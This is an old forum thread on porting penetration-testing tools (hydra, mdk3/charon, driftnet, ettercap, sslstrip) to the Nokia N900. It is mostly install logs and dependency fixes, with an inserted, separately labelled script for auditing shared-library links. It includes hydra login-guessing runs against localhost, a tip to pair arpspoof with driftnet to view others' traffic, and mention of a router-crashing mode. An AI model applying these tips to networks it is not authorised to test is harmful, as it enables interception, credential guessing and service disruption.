omg what a typo
it should be small i instead of big I
this is the silliest typo i have ever mistaken with
i will fix this now
thank you for reporting this
//EDIT:
uploaded a fixed version of charon
Hi Karam
I have the same error, i will later to install charon.
charon runs fine but it is in french any chance to change it ?
:-)
Now is working.
Same request like awett, plus the gui is so small i can not see much.
best regards
Netweaver
2012-02-14, 11:34
it seems there is another typo in the latest set of 'security' tools in the repo: now in the binary "/opt/driftnet/drifnet". No 't' in the executable name :)
btw, should that one work fine ? I ran "/opt/driftnet/drifnet -v -i wlan0" but it seems it's only seeing the local traffic, not switching into promiscuous mode.
Does one first need to do the iwconfig first to switch it to monitor mode? I thought that was done in the driftnet program itself?
PS. this is on my own network, I have the WPA2 key, I just wanna see how good it works:) The phone is running power49.
Running Charon is not always easy either, as it's crashing often.
Thanks anyway for the effort.
there must be a way to change it to english
however i can't do this my self as i have 0 expert with java things
wish someone can do that instead of me
and @q6600
so small ?
it has every kind of usage of mdk3
the point of it is to run many attacks together
like the destruction mode
it leads to a crash of a router
@Netweaver
oops didn't see your post
anyway
you must run arpspoof before using driftnet to see others traffic
and charon crashes are caused by icedtea6 as it's unstable
@Karam
you misunderstood me, i was referring to the fonts on the gui i can not see much.
again
i say it is icedtea6 problem
i run charon using j2me from easy debian
it has full font and no crashes
gorgezilla
2012-02-14, 18:28
hmmm...
when i try to run charon from xterm it asks for a password....any hints?
you are running it as root :)
run it as user because the launching script has : sudo
gorgezilla
2012-02-14, 21:04
Karam,
Nope, I am not running it as root and keeps asking for password.
any other hints?
psychologe
2012-02-15, 11:28
karam,thank you port these great hack tool to N900,
very like.
if you have free time, can you port THC-hydra7.2 to N900,
i think it will welcome
http://www.thc.org/thc-hydra/
have other question,i installed metasploit on N900,
but how let in support db command,
i try execute :gem1.8 install mysql , but failed
hydra is already ported
check the first post attachments
and about db support
you will need to have gcc and other tools to compile
not sure : but there is an app called tinygcc or something (development section)
however i don't recommend using this on N900
i have tried it once
veeeeeeeery slow
plus if any crash happened
the whole of /home partition is corrupted
it will lead to a reflash
@gorgezilla
as root :
java -jar /opt/charon2.0.1-karam/CHARON_2.0.1.jar
as user :
/usr/bin/charon
the shortcut works fine right ?
psychologe
2012-02-15, 12:05
karam, i know, but the latest hydra version is 7.2,
fix a lot bug, speed-up, add some services to support.
thanks ,i will install gcc to try it ,
thank your hard work.
taqisyed
2012-02-25, 10:57
why do i get 'permission denied' when i run mdk3 or charon even when i'm root.
sry about that
fixing it now
seems that there was (chown) error as i moved them from my N900 directly from MyDocs
as for new hydra well i can't compile anything now, i don't have time nor the good environment to do so
Compiled version of hydra 7.2 attached. This one does not have support for the following services: postgres sapr3 firebird afp ncp ssh svn oracle mysql5 and regex.
cannot complete it.. I encountered an error on Part 1.. stuck at step
"Now download karam.tar.gz from :
http://dl.dropbox.com/u/44965378/N900%20mods/karam.zip
Then put in MyDocs and :
-------
cd /home/user/MyDocs
tar -xzvf karam.tar.gz
-------
To have all needed files"
somebody help to complete this step by step..
@StefanL
thank you for compiling it
@i don't recommend using that method
i have uploaded most of the tools to extras-devel
//edit 1st post edited , thread subject changed
The attached version has some more modules enabled and also contains pw-inspector. Now the list of services not compiled in is: sapr3 firebird afp ncp ssh svn oracle. ;)
tell me if i have done it correctly or not..
BusyBox v1.10.2 (Debian 3:1.10.2.legal-1osso30+0m5) built-in shell (ash)
Enter 'help' for a list of built-in commands.
~ $ sudo gainroot
Root shell enabled
BusyBox v1.10.2 (Debian 3:1.10.2.legal-1osso30+0m5) built-in shell (ash)
Enter 'help' for a list of built-in commands.
/home/user #
/home/user # apt-get install nmap driftnet charon yamas wireshark tshark kismet cleven cowpatty
Reading package lists... Done
Building dependency tree
Reading state information... Done
nmap is already the newest version.
wireshark is already the newest version.
tshark is already the newest version.
kismet is already the newest version.
The following extra packages will be installed:
busybox-power dsniff ettercap ettercap-common libjpeg7
libnet0 libnet1 libssl0.9.7 macchanger mdk3 sslstrip
Suggested packages:
reaver wash
The following NEW packages will be installed:
busybox-power charon cleven cowpatty driftnet dsniff
ettercap ettercap-common libjpeg7 libnet0 libnet1
libssl0.9.7 macchanger mdk3 sslstrip yamas
0 upgraded, 16 newly installed, 0 to remove and 58 not upgraded.
Need to get 5557kB of archives.
After this operation, 12.0MB of additional disk space will be used.
Do you want to continue [Y/n]? Y
Get:1 http://repository.maemo.org fremantle/free mdk3 1.1 [48.5kB]
Get:2 http://repository.maemo.org fremantle/free charon 1.1 [1533kB]
Get:3 http://repository.maemo.org fremantle/free cowpatty 1.1 [15.5kB]
Get:4 http://repository.maemo.org fremantle/free libjpeg7 7-1.maemo5v1 [135kB]
Get:5 http://repository.maemo.org fremantle/free driftnet 1.2 [20.1kB]
Get:6 http://repository.maemo.org fremantle/free libnet0 1.0 [13.6kB]
Get:7 http://repository.maemo.org fremantle/free libssl0.9.7 1.0 [433kB]
Get:8 http://repository.maemo.org fremantle/free dsniff 1.2 [1879kB]
Get:9 http://repository.maemo.org fremantle/free libnet1 1.1.4-2maemo2 [56.7kB]
Get:10 http://repository.maemo.org fremantle/free ettercap-common 1:0.7.3-2maemo4 [310kB]
Get:11 http://repository.maemo.org fremantle/free ettercap 1:0.7.3-2maemo4 [188kB]
Get:12 http://repository.maemo.org fremantle/free sslstrip 0.9-0maemo1 [24.6kB]
Get:13 http://repository.maemo.org fremantle/free busybox-power 1.19.3power5 [517kB]
Get:14 http://repository.maemo.org fremantle-1.3/free macchanger 1.5.0-4 [90.2kB]
Get:15 http://repository.maemo.org fremantle-1.3/free cleven 2.4-8 [269kB]
Get:16 http://repository.maemo.org fremantle/free yamas 1.0.0-1 [23.1kB]
Fetched 5557kB in 54s (101kB/s)
Selecting previously deselected package mdk3.
(Reading database ... 32890 files and directories currently installed.)
Unpacking mdk3 (from .../archives/mdk3_1.1_armel.deb) ...
Selecting previously deselected package charon.
Unpacking charon (from .../archives/charon_1.1_armel.deb) ...
Selecting previously deselected package cowpatty.
Unpacking cowpatty (from .../cowpatty_1.1_armel.deb) ...
Selecting previously deselected package libjpeg7.
Unpacking libjpeg7 (from .../libjpeg7_7-1.maemo5v1_armel.deb) ...
Selecting previously deselected package driftnet.
Unpacking driftnet (from .../driftnet_1.2_armel.deb) ...
Selecting previously deselected package libnet0.
Unpacking libnet0 (from .../archives/libnet0_1.0_armel.deb) ...
Selecting previously deselected package libssl0.9.7.
Unpacking libssl0.9.7 (from .../libssl0.9.7_1.0_armel.deb) ...
Selecting previously deselected package dsniff.
Unpacking dsniff (from .../archives/dsniff_1.2_armel.deb) ...
Selecting previously deselected package libnet1.
Unpacking libnet1 (from .../libnet1_1.1.4-2maemo2_armel.deb) ...
Selecting previously deselected package ettercap-common.
Unpacking ettercap-common (from .../ettercap-common_1%3a0.7.3-2maemo4_armel.deb) ...
Selecting previously deselected package ettercap.
Unpacking ettercap (from .../ettercap_1%3a0.7.3-2maemo4_armel.deb) ...
Selecting previously deselected package sslstrip.
Unpacking sslstrip (from .../sslstrip_0.9-0maemo1_all.deb) ...
Selecting previously deselected package busybox-power.
Unpacking busybox-power (from .../busybox-power_1.19.3power5_armel.deb) ...
busybox-power: Maemo (N900) environment detected
Selecting previously deselected package macchanger.
Unpacking macchanger (from .../macchanger_1.5.0-4_armel.deb) ...
Selecting previously deselected package cleven.
Unpacking cleven (from .../cleven_2.4-8_armel.deb) ...
BEGIN preinstall@2.4-8: install
END preinstall@2.4-8: install
Selecting previously deselected package yamas.
Unpacking yamas (from .../yamas_1.0.0-1_armel.deb) ...
Setting up mdk3 (1.1) ...
Setting up charon (1.1) ...
Setting up cowpatty (1.1) ...
Setting up libjpeg7 (7-1.maemo5v1) ...
Setting up driftnet (1.2) ...
Setting up libnet0 (1.0) ...
Setting up libssl0.9.7 (1.0) ...
Setting up dsniff (1.2) ...
Setting up libnet1 (1.1.4-2maemo2) ...
Setting up ettercap-common (1:0.7.3-2maemo4) ...
Setting up ettercap (1:0.7.3-2maemo4) ...
Setting up sslstrip (0.9-0maemo1) ...
Setting up busybox-power (1.19.3power5) ...
Setting up macchanger (1.5.0-4) ...
Setting up cleven (2.4-8) ...
BEGIN postinstall@2.4-8: configure
Listing /opt/cleven/ ...
Compiling /opt/cleven/clevenCaptureUI.py ...
Compiling /opt/cleven/clevenDictionaryUI.py ...
Compiling /opt/cleven/clevenDriversUI.py ...
Compiling /opt/cleven/clevenKeysUI.py ...
Compiling /opt/cleven/clevenMain.py ...
Compiling /opt/cleven/clevenMainUI.py ...
Compiling /opt/cleven/clevenManageCapturedUI.py ...
Compiling /opt/cleven/clevenStartupUI.py ...
Listing /opt/cleven/compat-wireless ...
END postinstall@2.4-8: configure
Setting up yamas (1.0.0-1) ...
/home/user #
:)
Mohammed Muid
2012-02-26, 19:27
how to use driftnet? any tutorial? plz
The attached version has one more module enabled (ssh) and also contains pw-inspector. Now the list of services not compiled in is: sapr3 firebird afp ncp svn oracle. ;).
Please test and provide some feed-back, since I am not actually using this; only compiled it since Karam's development system is borked.
Mohammed Muid
2012-02-27, 15:44
is der anyone who successfully used driftnet. can you please share how to use that. i am nt being able to get it work out. plzz anyone help
spuddy101
2012-02-27, 16:56
The attached version has one more module enabled (ssh) and also contains pw-inspector. Now the list of services not compiled in is: sapr3 firebird afp ncp svn oracle. ;).
Please test and provide some feed-back, since I am not actually using this; only compiled it since Karam's development system is borked.
HI ive tried hydra 7.2 i have a problem when i run hydra i get an error
saying:libssl1.so.1.0.0 cannot open shared object file no such file or directory can you help thanks
The second uploaded version of hydra 7.2 is not working ( like in the PM StefanL) i had the same error like spuddy101. I install back the first version uploaded by stefanl on post 201.
hmm it seems it's grabbed by debian repository (binary or source)
if you have libss1 installed then do :
ln -s /usr/lib/libss.so.1.0.0 /usr/lib/libssl1.so.1.0.0
not sure as i have hydra installed on easy-debian
My N900 is my development environment so I do not have a fresh one to test the programs on; obviously on my set-up all the dependencies are satisfied since it compiled. :(
Try the following to fix missing dependencies
sudo apt-get install libssh libmysqlclient libpq libssl pkg-config libgtk2.0
Just try each of the packages after the install separately until you find the one that fixes the dependency. Report back here to let us know what works.
psychologe
2012-02-28, 04:48
hi StefanL,i download your attached on #207.
but it must install some lib.
when i execute below command,hydra can work.
1,apt-get install libidn11 libpq5 libssh2-1 libcrypt
2,ln -s /usr/lib/libss.so.1.0.0 /usr/lib/libssl.so.1.0.0
3,ln -s /usr/lib/libssh2.so.1 /usr/lib/libssh.so.4
4,ln -s /usr/lib/libcrypto.so.0.9.8 /usr/lib/libcrypto.so.1.0.0
i used valid login/password pairs test it on My N900's sshd and telnet server.but hydra can't suggest valid !
Nokia-N900:~# hydra -l root -p qazwsx 127.0.0.1 ssh
Hydra v7.2 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only
Hydra (http://www.thc.org/thc-hydra) starting at 2012-02-28 12:47:21
[DATA] 1 task, 1 server, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking service ssh on port 22
hydra: symbol lookup error: hydra: undefined symbol: ssh_new
[STATUS] attack finished for 127.0.0.1 (waiting for children to finish)
1 of 1 target successfuly completed, 0 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2012-02-28 12:47:21
Nokia-N900:~# hydra -l root -p qazwsx 127.0.0.1 telnet -vv
Hydra v7.2 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only
Hydra (http://www.thc.org/thc-hydra) starting at 2012-02-28 12:49:11
[WARNING] telnet is by its nature unreliable to analyze reliable, if possible better choose FTP or SSH if available
[VERBOSE] More tasks defined than login/pass pairs exist. Tasks reduced to 1.
[DATA] 1 task, 1 server, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking service telnet on port 23
[VERBOSE] Resolving addresses ... done
[STATUS] attack finished for 127.0.0.1 (waiting for children to finish)
1 of 1 target successfuly completed, 0 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2012-02-28 12:49:11
sudo apt-get install libidn11
sudo apt-get install libssh libmysqlclient libpq libssl pkg-config libgtk2.0
ln -s /usr/lib/libss.so.1.0.0 /usr/lib/libssl1.so.1.0.0
but still not working last hydra from post 207
i try
1,apt-get install libidn11 libpq5 libssh2-1 libcrypt
2,ln -s /usr/lib/libss.so.1.0.0 /usr/lib/libssl.so.1.0.0
3,ln -s /usr/lib/libssh2.so.1 /usr/lib/libssh.so.4
4,ln -s /usr/lib/libcrypto.so.0.9.8 /usr/lib/libcrypto.so.1.0.0
still no luck
bharathkumarst
2012-02-28, 15:32
@karam
Great efforts are put by you!
I am new to pentesting. Can you help me how to use these pentesting tools? Any tutorials for usage? Any videos? Pl help.
bharathkumarst
2012-02-28, 15:34
I am a windows user...
sudo apt-get install libidn11
sudo apt-get install libssh libmysqlclient libpq libssl pkg-config libgtk2.0
ln -s /usr/lib/libss.so.1.0.0 /usr/lib/libssl1.so.1.0.0
but still not working last hydra from post 207
i try
1,apt-get install libidn11 libpq5 libssh2-1 libcrypt
2,ln -s /usr/lib/libss.so.1.0.0 /usr/lib/libssl.so.1.0.0
3,ln -s /usr/lib/libssh2.so.1 /usr/lib/libssh.so.4
4,ln -s /usr/lib/libcrypto.so.0.9.8 /usr/lib/libcrypto.so.1.0.0
still no luck
Ok, I need to change my development environment. I had compiled the openssl 1.0.0.e library from the website and was testing it on my device, but official maemo one is 0.9.8. Sorry about the f@ck up. Will post a new compiled version soon. For those who are interested run the following in x-term
ldd hydra
and you will see which libraries are compiled into it. libssl and libcrypto are there twice. Will post more specifics on the required dependencies with the next version as well.
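Why the `ln -s` workarounds in the posts above end in `undefined symbol: ssh_new`, as an added example that is not code from the thread: libssh2 and libssh are separate libraries, so a link named `libssh.so.4` that points at `libssh2.so.1` loads but does not export libssh's `ssh_new`. The function names are hypothetical, the `ldd` listing is constructed sample output (the /usr/local/lib paths are assumptions), and the two link pairs are the ones posted above.

```shell
#!/bin/sh
# Added example: audit shared-library aliases and `ldd` output.

# lib_name / lib_ver: split "/usr/lib/libfoo.so.1.2" into "libfoo" and ".1.2".
lib_name() { basename "$1" | sed 's/\.so.*$//'; }
lib_ver()  { basename "$1" | sed 's/^.*\.so//'; }

# check_alias TARGET LINK: judge a symlink LINK -> TARGET by file name alone.
#   different-library  names differ, so exported symbols will not match
#   version-mismatch   same library, but LINK claims another ABI version
#   ok                 LINK's version is TARGET's version or a prefix of it
check_alias() {
    t_name=$(lib_name "$1"); l_name=$(lib_name "$2")
    t_ver=$(lib_ver "$1");   l_ver=$(lib_ver "$2")
    if [ "$t_name" != "$l_name" ]; then
        echo "different-library"
        return
    fi
    case "$t_ver" in
        "$l_ver"|"$l_ver".*) echo "ok" ;;
        *) echo "version-mismatch" ;;
    esac
}

# Constructed sample of `ldd hydra` output for a binary linked against a
# self-built OpenSSL 1.0.0 and the distribution's 0.9.8 at the same time.
sample_ldd() {
cat <<'EOF'
    libssl.so.1.0.0 => /usr/local/lib/libssl.so.1.0.0 (0x40021000)
    libcrypto.so.1.0.0 => /usr/local/lib/libcrypto.so.1.0.0 (0x40073000)
    libssh.so.4 => not found
    libssl.so.0.9.8 => /usr/lib/libssl.so.0.9.8 (0x401d0000)
    libcrypto.so.0.9.8 => /usr/lib/libcrypto.so.0.9.8 (0x40210000)
    libc.so.6 => /lib/libc.so.6 (0x40350000)
EOF
}

# ldd_report: read ldd output on stdin; print "missing SONAME" for unresolved
# entries and "duplicate NAME v1,v2" when one library is loaded in two versions.
ldd_report() {
    awk '
    {
        so = $1
        if ($2 == "=>" && $3 == "not") print "missing " so
        p = index(so, ".so")
        if (p == 0) next
        name = substr(so, 1, p - 1); ver = substr(so, p + 4)
        if (!(name in vers)) { vers[name] = ver; order[++n] = name }
        else if (!((name, ver) in seen)) {
            vers[name] = vers[name] "," ver; dup[name] = 1
        }
        seen[name, ver] = 1
    }
    END {
        for (k = 1; k <= n; k++)
            if (order[k] in dup) print "duplicate " order[k] " " vers[order[k]]
    }'
}

# Stand-alone run: the two aliases from the thread, then the sample listing.
check_alias /usr/lib/libssh2.so.1 /usr/lib/libssh.so.4
check_alias /usr/lib/libcrypto.so.0.9.8 /usr/lib/libcrypto.so.1.0.0
sample_ldd | ldd_report
```

Anything other than "ok" means the binary should be rebuilt against the library the device actually ships, or the matching package installed, rather than aliased.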
Any help for you guys
Looks like that is not my latest compiled version, all you have in there is the openssl libraries (libcrypto and libssl). All the other libraries should already be on the system (check /usr/lib). To get the openssl libraries try this
sudo apt-get install openssl
I have the latest version of openssl. I install the first version of hydra 7.2 and is working fine.
Yep, for now the first (http://talk.maemo.org/showpost.php?p=1169619&postcount=201) version is best until I have sorted out the dependencies. I have now a compiled version that only requires openssl 0.9.8n, but still looking into getting all the other dependencies (like libssh, libidn, etc.) in order so that people can run the version with the most functionality enabled. Should be out over the weekend.
stevomanu
2012-03-10, 19:24
Well i loaded up charon and it aint in english does anybody know how to change it ??
seems like a cool app from what research i done on it ...
Mohammed Muid
2012-03-10, 20:10
i tried to run driftnet. how to do that? i failed. can you please help me
shockingfm
2012-03-15, 01:09
Well i loaded up charon and it aint in english does anybody know how to change it ??
seems like a cool app from what research i done on it ...
Stevomanu
How did you load up Charon?
I installed it but no icon, so i went to xterminal under sudo gainroot and it then typed "charon2.0" but get permission denied
any help would be fantastic
Nick
stevomanu
2012-03-15, 01:12
Try this command as root
java -jar /opt/charon2.0.1-karam/CHARON_2.0.1.jar
Stevomanu
How did you load up Charon?
I installed it but no icon, so i went to xterminal under sudo gainroot and it then typed "charon2.0" but get permission denied
any help would be fantastic
Nick
shockingfm
2012-03-15, 01:27
Try this command as root
java -jar /opt/charon2.0.1-karam/CHARON_2.0.1.jar
Genius!! thanks!
errm its in French. Damn! do we know if anyone is working on it?
Mohammed Muid
2012-03-15, 01:42
how to load up driftnet too. i also tried many commands.
spuddy101
2012-03-15, 12:01
Genius!! thanks!
errm its in French. Damn! do we know if anyone is working on it?
i just open xterm and typed charon and it worked fine for me.
shockingfm
2012-03-15, 13:12
i just open xterm and typed charon and it worked fine for me.
thanks spuddy! that works too!
what the hell was i doing before to make it not work?!
Mohammed Muid
2012-03-15, 13:43
how to run driftnet then? just typing driftnet doesnot work. i enabled ip forwarding. how to use driftnet? i also created a folder in MyDocs for the images to be stored there
stevomanu
2012-03-15, 14:01
This might help , great site for other security stuff so i dont see why not ....
http://www.securitytube.net/video/664
how to run driftnet then? just typing driftnet doesnot work. i enabled ip forwarding. how to use driftnet? i also created a folder in MyDocs for the images to be stored there
i'm wondering why i'm getting
"E: Couldn't find package xxxx"
when i apt-get install...?
stevomanu
2012-03-15, 16:16
Well it would help if we had a clue as to what your trying to install. ..
i'm wondering why i'm getting
"E: Couldn't find package xxxx"
when i apt-get install...?
was trying to install the whole thing..
"apt-get install nmap driftnet yamas wireshark charon etc2"
fixed it by enabling the repos in app manager..i've disabled it before because i'm using FAPman instead of "apt-get install"..cheers!
btw, charon is in what language?lol..can't seem to understand it...it's nice to have a GUI for mdk3...hmmpph!! =D
Mohammed Muid
2012-03-16, 02:46
i get this while trying to open charon::
Nokia-N900:~# java /jar /opt/charon2.0.1-karam/CHARON_2.0.1.jar
Exception in thread "main" java.lang.NoClassDefFoundError: /jar
Caused by: java.lang.ClassNotFoundException: .jar
at java.net.URLClassLoader$1.run(URLClassLoader.java:217)
at java.security.AccessController.doPrivileged(Native Method)
at java.net.URLClassLoader.findClass(URLClassLoader.java:205)
at java.lang.ClassLoader.loadClass(ClassLoader.java:321)
at sun.misc.Launcher$AppClassLoader.loadClass(Launcher.java:294)
at java.lang.ClassLoader.loadClass(ClassLoader.java:266)
at java.lang.ClassLoader.loadClassInternal(ClassLoader.java:334)
Could not find the main class: /jar. Program will exit.
Nokia-N900:~#
open terminal, type charon..
don't have to be root i guess..i launched it that way..and perhaps u don't have icedtea6 installed?
Mohammed Muid
2012-03-16, 05:41
thanks. that did it. i tried that before but didn't work. charon is in diff language. i cant change the language to english. how to do that sir?
i have no idea how to change it to english..i think u have to change the jar files..but i can't seem to b able to edit it using jar editor..lol..and i dont know which file to edit as well..haha
Mohammed Muid
2012-03-16, 11:00
So whats the point? Cant use it anyway. I can perform b a and d with xterminal. Works like a charm. So the people who doesnt know this language cannot use it? Y wud even any1 use this language.
spuddy101
2012-03-16, 14:56
So whats the point? Cant use it anyway. I can perform b a and d with xterminal. Works like a charm. So the people who doesnt know this language cannot use it? Y wud even any1 use this language.
well if i can find a good java editor and a french translator i might give
it a try lol
psychologe
2012-03-17, 09:02
hi ,karam and everybody.
i compiled and make install Nmap 5.61TEST5 on my N900,,but can't work. input:nmap --iflist ,output:INTERFACES: NONE FOUND(!) ,ROUTES: NONE FOUND(!)
has someone interest ,let Nmap 5.61 work on N900.
Search for nmap thread - it was compiled already. It was working fine for some time, but since a mainstream update, this problem appears, when nmap is run as root.
As user, "INTERFACES" NONE FOUND(!)" doesn't appear, but, obviously, You can't use features that require root privileges.
If You're able and would like to take over maintainership of nmap, it would be great, as it seems that original maintainer gave up on this. But please, use an existing thread for further discussion. If You'll be able to figure out how to fix this "root bug", I would bless You ;)
/Estel
// Edit:
nmap thread:
http://talk.maemo.org/showthread.php?t=48673
sorry guys i have been off for a while
as for charon
well the creator of it is french
it would be so appreciated if someone can change the language of it
as for launching charon
doesn't the shortcut work ? i remember that last version is fixed?
still planning to launch another gui for mdk3
ENGLISH and much more smoother and doesn't need the buggy icedtea6
@Estel. psychologe
i guess i will be able to fix nmap
i'll work on it as soon as i have a free time :)
D@vIcHoJD
2012-03-19, 21:31
sorry guys i have been off for a while
as for charon
well the creator of it is french
it would be so appreciated if someone can change the language of it
as for launching charon
doesn't the shortcut work ? i remember that last version is fixed?
still planning to launch another gui for mdk3
ENGLISH and much more smoother and doesn't need the buggy icedtea6
@Estel. psychologe
i guess i will be able to fix nmap
i'll work on it as soon as i have a free time :)
Apparently when karam fixed problems in shortcut, made a mistake instead of directing to applications, you did to application folder.:D
I have the shortcut charon, I did so, in filefox access /usr/share/application/hildon copy and paste charon.desktop file in /usr/share/applications/hildon and ready will have shortcut charon.
I hope someone charon translated into other languages (en, sp, etc.):D:D
oh typos are my worst fears
just uploaded a quick fix
thank you for reporting :)
stevomanu
2012-03-21, 00:28
I only looked at your metasploit post but your packages are a little outdated in the post , have a look here at newest working ones ....
http://talk.maemo.org/showthread.php?t=81816
Great job though ...
@karam
I post in Phonesfera.com (http://www.phonesfera.com/) how to install metasploit, ettercap, sslstrip, backtrack and more...
Tutorial Metasploit (Spanish) (http://www.phonesfera.com/tutoriales-maemo-5/4540-%5Btutorial%5D-metasploit-n900.html)
Tutorial Ettercap & Sslstrip (Spanish) (http://www.phonesfera.com/tutoriales-maemo-5/4027-%5Btutorial%5D-ettercap-sslstrip.html)
Tutorial Backtrack (Spanish) (http://www.phonesfera.com/tutoriales-maemo-5/4752-%5Btutorial%5D-backtrack-5-en-el-n900-trav%E9s-de-presencevnc-inestable.html)
Verssetti
2012-03-21, 00:47
yep my post have one year ago. ty for the updates, update my tutorial now
stevomanu
2012-03-21, 00:52
No problem i also made a post on SET as well have a look at that ....
http://talk.maemo.org/showthread.php?t=81964
...
yep my post have one year ago. ty for the updates, update my tutorial now
What is is, a positioning spam?...